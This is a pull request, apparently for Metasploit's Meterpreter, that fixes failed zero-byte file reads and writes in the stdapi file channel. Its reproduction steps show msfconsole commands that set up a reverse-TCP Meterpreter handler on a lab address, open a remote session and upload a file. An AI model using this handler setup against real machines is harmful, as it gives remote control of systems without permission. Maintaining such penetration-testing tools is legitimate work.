### PR TITLE
handle zero-byte reads and writes gracefully

### DIFF
--- a/source/extensions/stdapi/server/fs/file.c
+++ b/source/extensions/stdapi/server/fs/file.c
@@ -26,7 +26,7 @@ static DWORD file_channel_write(Channel *channel, Packet *request,
 	DWORD written = 0;
 
 	// Write a chunk
-	if ((written = (DWORD)fwrite(buffer, 1, bufferSize, ctx->fd)) <= 0)
+	if (bufferSize && (written = (DWORD)fwrite(buffer, 1, bufferSize, ctx->fd)) <= 0)
 	{
 		written = 0;
 		result  = GetLastError();
@@ -67,7 +67,7 @@ static DWORD file_channel_read(Channel *channel, Packet *request,
 	DWORD bytes = 0;
 
 	// Read a chunk
-	if ((bytes= (DWORD)fread(buffer, 1, bufferSize, ctx->fd)) <= 0)
+	if (bufferSize && (bytes= (DWORD)fread(buffer, 1, bufferSize, ctx->fd)) <= 0)
 	{
 		bytes = 0;
 		result = GetLastError();


### PR DESCRIPTION
When writing to a file channel, it is possible to open a file and have an implicit '0' byte write. For instance, when opening an empty file open, like so:

```
  ::File.open(local_file_name, "")
```

or 'touching' a file as in write_file("meterpreter-test", "") in test/modules/post/test/file.rb
or uploading a zero-length file.

# Steps to reproduce/verify

Before:
```
$ touch hello
$ ./msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(handler) > run

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...
[*] Sending stage (787456 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.1:4444 ->
192.168.56.1:55621) at 2015-01-27 11:23:09 -0600

meterpreter > upload hello
[*] uploading  : hello -> hello
[-] core_channel_write: Operation failed: The parameter is incorrect.
```

After:
```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(handler) > run

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.56.10
[*] Meterpreter session 1 opened (192.168.56.1:4444 ->
192.168.56.10:49833) at 2015-01-27 11:26:03 -0600

meterpreter > upload hello
[*] uploading  : hello -> hello
[*] uploaded   : hello -> hello
```